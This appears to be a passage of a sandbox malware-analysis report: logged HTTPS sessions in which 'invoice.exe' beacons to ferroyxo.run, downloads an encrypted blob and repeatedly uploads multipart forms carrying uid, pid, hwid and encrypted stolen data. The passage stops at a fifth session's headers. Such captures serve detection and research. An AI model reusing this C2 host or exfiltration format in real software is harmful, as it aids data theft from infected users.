                                                                        0192.168.2.749681172.67.131.1704436892C:\Users\user\Desktop\invoice.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-04-02 09:42:45 UTC263OUTPOST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 51
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:45 UTC51OUTData Raw: 75 69 64 3d 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 26 63 69 64 3d
                                                                        Data Ascii: uid=e91dba334d13b3862d5fcf1c07f54f82f2e4b89799&cid=
                                                                        2025-04-02 09:42:46 UTC244INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:45 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 33661
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        Cf-Cache-Status: DYNAMIC
                                                                        CF-RAY: 929f60c7ade09d36-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-04-02 09:42:46 UTC1125INData Raw: 8f 2f b8 b7 7a 84 9e 52 73 f3 12 4e 8e e1 cd ea 51 de 99 26 38 f9 25 9e 56 72 16 ea 80 ea af 71 09 2c bd 42 bb 89 ea ca 64 70 35 ad a2 ae 24 73 47 ab 65 29 f7 0c ac 69 1a b7 f3 ec 80 80 f9 52 bc af 42 d7 ca d2 3f c1 73 fe 37 14 eb 04 41 35 12 96 71 ff e9 f2 bb 7e c1 40 0a 90 79 b7 72 b9 6c cb d6 ad b0 56 de 38 24 41 56 f3 78 d4 d9 e5 82 e8 88 4f 97 43 11 3c a5 b7 54 18 c6 14 82 51 f0 4b 28 8c 08 f0 f8 03 44 8c 3b 60 ad 66 ab f4 aa bb 47 2f 5f 85 ae 0f 1e b3 a6 31 2c 79 08 ee d4 7e ad 0d b3 88 ee d9 2b 0d 63 10 b1 21 ca cd d3 4c 4c 0f 9f 81 da 10 ac 3f 63 c2 5f 76 3f a7 7f b3 8f 89 bd e5 01 08 ec 79 8f 5d cc 47 69 70 e5 2e 88 cb 37 ac af 4d 30 79 f1 50 19 ff 19 4a dc c6 e2 35 4e ca e5 db 4e 4c bd fb 5a ed 7c 33 2b fb 88 8f dc a3 fe 41 c7 7f 70 dd 3e 32 a9
                                                                        Data Ascii: /zRsNQ&8%Vrq,Bdp5$sGe)iRB?s7A5q~@yrlV8$AVxOC<TQK(D;`fG/_1,y~+c!LL?c_v?y]Gip.7M0yPJ5NNLZ|3+Ap>2
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: 85 93 c0 5a 46 bd 20 ca 91 99 9b ae c9 18 35 64 33 b5 9a b6 d2 19 0b 0e db 6b c5 97 32 19 31 e1 9c 8b ae c3 84 a5 de 8b be 16 d4 4b 23 43 8e 0b 72 be 47 71 26 3d 27 2f ac 22 b3 d4 b1 c7 42 12 c8 ad 0c 23 37 c4 f2 0e b7 5a a0 c9 b8 83 8b 9b b8 a6 43 a3 e1 a8 db aa 8c 19 06 b9 e7 a0 84 70 96 82 fc 7c 3f ac 65 5b aa e6 60 de fd 6f 61 b2 72 6a a9 0e a4 c6 7c 68 c7 2c d3 3b 0a eb 4f f9 a8 22 ec 7b 7b 5b ae 6a 97 85 49 1b 27 dc 01 95 61 2e da 43 bb 2d 10 52 93 5a a8 bd e9 2c 7f 82 ed 60 34 02 b7 65 61 65 25 69 86 79 ae 99 d0 72 75 7a 07 c1 ec c3 6c 32 af d3 23 18 fd 7e 13 d1 d5 75 9c 57 04 77 41 a7 a3 fb c6 38 d3 19 2d dc 0d 76 91 e6 70 ef 28 11 7e e8 d0 96 b0 c2 1a 48 57 04 de 73 37 91 14 8c bc 5f 1d 75 a7 2a 90 9f 82 42 fd ed 38 bb 82 a2 15 71 3f f1 ad 44 b7
                                                                        Data Ascii: ZF 5d3k21K#CrGq&='/"B#7ZCp|?e[`oarj|h,;O"{{[jI'a.C-RZ,`4eae%iyruzl2#~uWwA8-vp(~HWs7_u*B8q?D
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: 8c 25 c7 31 d7 13 d5 cc 84 ad 0f a4 12 d0 95 21 cd 4d c1 17 a5 ea 2e 18 75 b9 c6 9c ab 0d 89 87 19 b0 67 c8 cd a1 8b 26 24 2e 1f e7 96 91 4b 07 64 11 c8 fc 14 d6 1c cd 36 a0 4f 48 bf 1c e2 68 40 fd 0d ee a1 ae da 8a 97 f0 21 a8 b0 e4 1b 0d ca c7 ce 3b 36 03 01 52 79 08 ea 64 a3 f3 65 f9 03 8c 68 eb 27 aa ed 06 63 06 fa 0a 28 99 0a 00 1d d3 44 9d 6d e7 fe af bd 33 0b a4 e2 62 0c 47 f8 cb c4 b9 03 16 85 58 10 15 9e 15 a1 ed 03 d3 5d d1 a0 91 dc f4 a4 5b 7f 13 9d 3d 9d 49 9e a8 10 33 d7 ac 31 a8 8e 81 2e 0d 52 88 47 f5 83 63 5e bd 6f d2 98 0b 9f 06 9a 12 73 cb 3c 93 61 ba 53 59 29 1a 65 97 9c 4b 41 7f 1b d6 56 00 c1 8a 5c 9c 15 1f 3c da 45 33 cd 64 d0 03 bf c7 c2 f7 fa 1a 78 2b e3 73 57 ae 54 f6 8b 7c 27 cd 45 81 3d ce 91 2a fa f3 e9 67 7e 45 20 0f 23 9c 96
                                                                        Data Ascii: %1!M.ug&$.Kd6OHh@!;6Rydeh'c(Dm3bGX][=I31.RGc^os<aSY)eKAV\<E3dx+sWT|'E=*g~E #
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: 71 45 f4 eb 9c d8 7f 8b 9b d7 5d dc 05 5f 2d 34 95 8e 5d e9 cd ea e8 51 cc 1b f7 65 a4 08 ff 5a 96 b0 0c 26 a5 24 70 f0 44 28 5d e6 a7 e1 38 57 aa a6 a9 60 c1 0c 96 26 04 bc dd d8 ef 45 8f 07 8a 9d 10 32 43 7a 18 70 35 7c 7f d4 e2 85 a0 25 2e c3 f4 4f cc 93 28 19 75 66 8d f0 ae fa 35 7e 67 d0 c6 b5 a9 3b 53 c1 9a a6 f9 95 ee cd c5 94 ac 50 ad 64 cd a6 8b 4c 30 5b 05 04 8b f7 8b c7 63 b3 5e 70 dc 22 78 97 0d e1 4c da f1 ef 3e 42 2f 72 ee 54 96 5e 23 ac 7e 75 ac 38 57 22 5d 9a 22 cc 7a 1e e2 e1 c5 ce 06 88 b9 16 69 20 12 a4 8c 32 37 4b ae b0 53 b5 53 22 d3 df 8f 2a e8 36 39 d4 46 2c 5d e1 b0 84 17 50 f1 7f 99 2f 33 18 e1 a2 54 22 8c 52 5d 31 e5 9f b1 f1 93 06 a8 8a ad a7 84 c0 54 89 a9 e4 15 97 68 6c e9 17 4c 6e 25 ca 86 10 ef 94 26 f0 ba c2 08 31 ec c2 17
                                                                        Data Ascii: qE]_-4]QeZ&$pD(]8W`&E2Czp5|%.O(uf5~g;SPdL0[c^p"xL>B/rT^#~u8W"]"zi 27KSS"*69F,]P/3T"R]1ThlLn%&1
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: e7 3d 95 ef 8a dd 87 62 38 3b db 0c 7a 79 40 15 3b f0 98 11 3a 16 16 ca e6 30 ed c7 bf 85 84 cd a0 ab 67 d8 c7 25 89 60 aa 68 09 4a be 55 13 cd 99 a0 43 e6 c6 4d 6a 08 7a 78 b5 1a 6b 34 68 e0 57 98 00 e3 a5 41 b5 10 93 5c a3 d8 6f 95 d0 7f a5 24 89 6e 16 6b b5 5f 9b c8 f7 86 4f f4 f5 87 80 00 76 f0 90 24 2e f5 c0 cd b7 65 9f e4 18 c0 9b 5f d6 64 72 ad 34 59 36 fa 69 99 ab b3 13 73 5d 95 bf 19 c4 9e c6 38 2c 31 c4 ee 6c 1a c4 f8 0b 62 81 20 f5 a5 dd 9e 63 49 e7 b2 9e 67 77 66 1c f1 fc ab 20 3c 43 7e a1 7c 2e 1f b4 d1 ff 26 92 c9 99 aa ea d4 64 09 9d 76 c5 61 50 c5 58 24 ec 5b cc 1e 52 d2 7f cb f8 4e 52 ae f9 3e 97 0a 5c 2e 6c b7 1f db 9e 0b 65 e2 f6 34 20 43 46 c4 b1 e6 35 70 62 d7 3e 17 b2 21 2e b7 b3 11 ed 51 05 81 c4 23 eb 39 67 37 01 aa 5f 6f 4b 5c db
                                                                        Data Ascii: =b8;zy@;:0g%`hJUCMjzxk4hWA\o$nk_Ov$.e_dr4Y6is]8,1lb cIgwf <C~|.&dvaPX$[RNR>\.le4 CF5pb>!.Q#9g7_oK\
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: 71 5f 3d 38 55 82 77 08 1f 2d 1a de ad 24 c0 4f 70 da c3 af e3 3e a4 b0 42 29 0b e8 13 0b 30 e9 d1 54 f2 75 d7 9b 36 c7 2b 1d b2 6f 2a 12 e9 e8 8c 3d 00 64 74 d4 e6 25 d0 c1 9b cf 86 41 61 4d b5 bf 34 23 70 54 a8 e2 ca e4 35 3f fb d4 fd 52 21 c2 a1 ad 32 ef ba 27 c4 2e 21 6a 52 dd 91 03 eb d3 af 83 5c 58 df 13 1a 12 82 3f 2b be 1a 93 f7 f6 7b 4d cc 6d 2f 33 d7 ac 59 83 9e cc f4 cb 8f fe bf 56 53 1b 3b 31 c1 a4 e1 85 be 22 e3 9a 3c 39 5a 65 7e 86 b9 b7 a4 be dc 88 27 09 ad 1b 4b dc 25 81 0a 65 f3 36 fd ba 46 76 d2 59 41 17 e4 1d ef c0 00 52 5a 0c a3 a6 e0 51 cc 83 82 bf ec 18 da bb b0 4e f3 7f 55 67 65 f8 43 43 c4 f0 8c 95 56 3a e0 48 eb ee ca 96 04 e2 22 60 5e e0 84 b4 c9 22 30 45 7c 1b 52 b7 f7 e5 b7 6b c7 e5 59 56 36 8e 30 7f f9 eb 26 3d be f1 04 fe c6
                                                                        Data Ascii: q_=8Uw-$Op>B)0Tu6+o*=dt%AaM4#pT5?R!2'.!jR\X?+{Mm/3YVS;1"<9Ze~'K%e6FvYARZQNUgeCCV:H"`^"0E|RkYV60&=
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: e6 30 ec ac 31 e5 d9 57 a7 2f e8 fd 55 81 55 28 e7 2c 8a 62 fe f1 e0 a1 41 e7 73 ca af 60 03 e5 39 5d c5 3b 57 92 be 97 f6 9a fc bc c8 9e bd 52 79 0a fb 45 84 4b 2c d1 5a 86 ee b8 d7 ab e7 f2 09 76 29 2d 68 d4 3d 99 5b 9c 9c ac 96 d7 bd f7 0b b4 23 55 0b d4 1c b4 de 81 be cb ae 25 4f 6b 62 b5 f6 45 d7 bf ff c2 05 d8 15 b9 7d 28 2b 37 89 e1 2d 80 1e 06 7b db 47 b5 b6 00 62 a9 90 48 b2 5f 9a 6e 28 16 7e b3 ff ed 45 aa 26 3f 34 c3 1d 96 72 8d 94 ea e4 b5 e9 b7 be 27 0d 3a 33 5d 2d 5f 10 db d2 35 02 e0 49 fe 10 97 c3 5b b6 f3 b0 a3 bd 56 b5 63 36 3b ab ea ae 94 e9 07 ce 85 e9 e3 a0 ef 37 60 a1 ba c0 a0 15 79 3f 2a 9b 61 36 f7 79 15 7c c2 d9 5e 43 54 eb 1c 89 95 9e 2c 95 b7 ab 63 55 1e 94 e6 11 4a fc 0f 45 e0 2f 1b a2 eb 36 e1 76 ba 99 d1 42 10 db 0f 2c 8b 1a
                                                                        Data Ascii: 01W/UU(,bAs`9];WRyEK,Zv)-h=[#U%OkbE}(+7-{GbH_n(~E&?4r':3]-_5I[Vc6;7`y?*a6y|^CT,cUJE/6vB,
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: 7b fd ef 5e 65 91 6e e0 d6 18 4a 07 e8 2d 08 0f df d8 bb fb a1 df 9b db 67 a2 53 1d cb 6d 6d 7c c4 1f cb 2a c7 14 53 31 aa a1 87 d1 ee 12 29 8c c3 cf 7c 08 f4 81 c2 89 0b c4 ad 81 19 7f 7f 90 dc aa 1f c7 44 3a 57 4a d2 c4 26 79 b7 91 0c 60 ce cf 76 87 c6 70 8f 9b be 77 91 4a d8 84 3d 0f 72 7f 98 ad 08 4c a6 cf 60 b8 7e ac 90 60 03 53 eb 6b 9c 4a 9c f3 5c 78 c6 71 e8 7d 84 29 b4 ed 8e 16 5c 55 30 2c fd bc e6 8b 36 36 ff 5a 5f 3e 99 ab f8 38 2c 82 15 3b e4 00 05 b6 6f ac 98 ac 18 52 71 1a 9a c9 b3 7c 09 4a 9c b9 5d fd 51 1a 47 d2 8a b4 8e 56 02 5f 64 65 a7 b7 ea 07 e1 98 25 1e 17 ba 4f 67 89 e0 9c 9c df 07 8a 13 fe a0 af 79 83 4a 39 c0 4f 11 55 24 69 d3 2e 63 3b 99 23 2b 8e 43 09 6a 28 4e 29 82 fc da ca 21 19 f9 c4 4b 5f f8 e0 95 d2 f3 c0 95 4d 26 cd d4 6c
                                                                        Data Ascii: {^enJ-gSmm|*S1)|D:WJ&y`vpwJ=rL`~`SkJ\xq})\U0,66Z_>8,;oRq|J]QGV_de%OgyJ9OU$i.c;#+Cj(N)!K_M&l
                                                                        2025-04-02 09:42:46 UTC211INData Raw: a4 c1 b2 76 e4 df f4 6b 7a 0a cd 45 5f 1e 43 52 d2 1f 99 13 0f 6a 65 12 a7 14 d5 1a 59 a2 a0 76 18 45 8a 04 bb 23 57 af 46 92 51 24 07 8b ff b4 d8 c8 f5 8c 46 b2 58 b8 97 75 3e 3e 16 03 a6 ee 52 16 04 b7 2d d9 58 1a 49 97 ab eb 04 06 94 08 cc 27 ad d6 cb 29 a0 1e f5 fd 1a 16 75 03 b0 04 e6 ab ce 77 21 d1 f3 f6 4d cf 69 a0 39 66 9c d7 57 34 17 ee 34 c5 bc a7 c3 13 92 9c c5 28 64 95 f3 ab 0f 55 26 99 51 2a 64 c8 be 44 10 c2 3a 21 7d f3 cb a0 75 e2 e8 1e 86 5a aa 17 2d a3 84 45 cd d5 12 6a f6 a6 dc 3a bc 65 db 28 4a ac fa f9 4f e1 74 ea e3 1d 1e d1 65 24 d7 ce a9 b6 0e e2 c7 7b b6 11 e0 db e9 98 8f f0 9c 6b 54 63 d0 81 73 fe 75
                                                                        Data Ascii: vkzE_CRjeYvE#WFQ$FXu>>R-XI')uw!Mi9fW44(dU&Q*dD:!}uZ-Ej:e(JOte${kTcsu


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.749682172.67.131.1704436892C:\Users\user\Desktop\invoice.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-04-02 09:42:46 UTC279OUTPOST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=v3zzUIS0f2zrKhOW
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 14498
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:46 UTC14498OUTData Raw: 2d 2d 76 33 7a 7a 55 49 53 30 66 32 7a 72 4b 68 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 76 33 7a 7a 55 49 53 30 66 32 7a 72 4b 68 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 76 33 7a 7a 55 49 53 30 66 32 7a 72 4b 68 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46 43 32 30 34 44 46
                                                                        Data Ascii: --v3zzUIS0f2zrKhOWContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--v3zzUIS0f2zrKhOWContent-Disposition: form-data; name="pid"2--v3zzUIS0f2zrKhOWContent-Disposition: form-data; name="hwid"4DFC204DF
                                                                        2025-04-02 09:42:47 UTC804INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:47 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBWvPYFn%2B8y3r3lKdSlLYn5v9v1VMznHGBYCIaDSLFgAcXsRzpMfoLzn9tPUvvJxCKTGSANVgFOJz%2BCcJFVyQ2JkLm%2BH1oAm3X3L2U001b11UrF2QWATsyeAD9AxisY%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 929f60cf1c949a1a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=97717&min_rtt=97498&rtt_var=20896&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2827&recv_bytes=15435&delivery_rate=37956&cwnd=188&unsent_bytes=0&cid=cf65c3c420713577&ts=542&x=0"
                                                                        2025-04-02 09:42:47 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.749683172.67.131.1704436892C:\Users\user\Desktop\invoice.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-04-02 09:42:48 UTC281OUTPOST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=1f0d8SnvYvUO656QMv
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 15070
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:48 UTC15070OUTData Raw: 2d 2d 31 66 30 64 38 53 6e 76 59 76 55 4f 36 35 36 51 4d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 31 66 30 64 38 53 6e 76 59 76 55 4f 36 35 36 51 4d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 66 30 64 38 53 6e 76 59 76 55 4f 36 35 36 51 4d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46
                                                                        Data Ascii: --1f0d8SnvYvUO656QMvContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--1f0d8SnvYvUO656QMvContent-Disposition: form-data; name="pid"2--1f0d8SnvYvUO656QMvContent-Disposition: form-data; name="hwid"4DF
                                                                        2025-04-02 09:42:48 UTC806INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:48 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1W%2BhfeQ9Nwr9DaoRGNkVB0OlZlgtH%2FNxfcMWnj838J9s4Ssrm9QF%2Bqxv54vKp7iOwabEzi%2BLGprpzHddi2BYAnBI49v5nEeqJQZL3CtXJ0QYJ9QN5sQnVGcJGdSa4UY%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 929f60d7ccde086e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=97765&min_rtt=96783&rtt_var=21305&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2827&recv_bytes=16009&delivery_rate=38408&cwnd=225&unsent_bytes=0&cid=b50273a415550767&ts=556&x=0"
                                                                        2025-04-02 09:42:48 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.749684172.67.131.1704436892C:\Users\user\Desktop\invoice.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-04-02 09:42:49 UTC275OUTPOST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=d2pj0dUd2nx8
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 20365
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:49 UTC15331OUTData Raw: 2d 2d 64 32 70 6a 30 64 55 64 32 6e 78 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 64 32 70 6a 30 64 55 64 32 6e 78 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 64 32 70 6a 30 64 55 64 32 6e 78 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46 43 32 30 34 44 46 30 44 39 32 36 38 44 46 33 45 39 36
                                                                        Data Ascii: --d2pj0dUd2nx8Content-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--d2pj0dUd2nx8Content-Disposition: form-data; name="pid"3--d2pj0dUd2nx8Content-Disposition: form-data; name="hwid"4DFC204DF0D9268DF3E96
                                                                        2025-04-02 09:42:49 UTC5034OUTData Raw: 50 0b 86 af f1 d1 d0 c9 04 8f c0 d7 d3 68 b8 33 3b f8 1d 44 c3 e0 2f c4 2b 2c ed 18 73 1a 1f ac da 42 34 cc fc 79 07 0e a9 9d 4f 84 67 b9 38 b1 a7 f5 a9 73 7a 30 99 a4 11 34 a9 8a 36 88 48 d3 a6 e7 ff 4a 5b 55 8c 09 cb ce 35 c3 a5 e2 71 5c 63 e9 79 03 95 c1 54 81 56 3e 75 f9 26 a9 57 7d ca ca fc 49 9e 8c ce bf ec 48 1e 71 51 4d 5c da 14 03 a7 21 64 08 02 33 0b 9a 56 d4 0e d4 35 d8 94 cf e5 88 99 37 9c 61 db 83 dd 4e a0 48 f5 06 5a de cf e3 82 26 60 81 9f 21 c5 9e 60 fd 82 80 9e 45 83 0f 64 bf 62 f8 61 69 f6 dd 81 42 0e d6 64 ca bd 2a bd f4 6b c7 fb 75 89 5e b3 fd 07 e0 7e 0a b2 8d db b6 04 aa 36 53 7d d3 6f c2 f0 c8 53 23 4e 10 c5 c4 ac af 1c 3e b7 2b c2 42 45 ff 16 b0 4e 2b 7f 31 e1 db 1f 5d c8 8a 7c ef fe 9c c5 c2 59 c8 26 e0 33 0a 25 91 39 ef c0 56 b4
                                                                        Data Ascii: Ph3;D/+,sB4yOg8sz046HJ[U5q\cyTV>u&W}IHqQM\!d3V57aNHZ&`!`EdbaiBd*ku^~6S}oS#N>+BEN+1]|Y&3%9V
                                                                        2025-04-02 09:42:49 UTC806INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:49 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5d4Y8TPuKukFnrldtSLoF2wXiYX5xK1%2B3gU%2FDS%2F9P7LmkPzEvau4ECzI2OnXPAp5R%2Bva8oIkL8GZGI5aXoCPqXkJYkKHvtoDMyHk7AB98i3pBZiuUUP8HcjBrx4FfuM%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 929f60de1fb31705-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=99178&min_rtt=98511&rtt_var=21790&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2828&recv_bytes=21320&delivery_rate=37036&cwnd=233&unsent_bytes=0&cid=446ec87f5fca2a0b&ts=593&x=0"
                                                                        2025-04-02 09:42:49 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.749685172.67.131.1704436892C:\Users\user\Desktop\invoice.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-04-02 09:42:51 UTC281OUTPOST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=04CpSY8Q9xhdWEUI49d
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 2404
                                                                        Host: ferroyxo.run
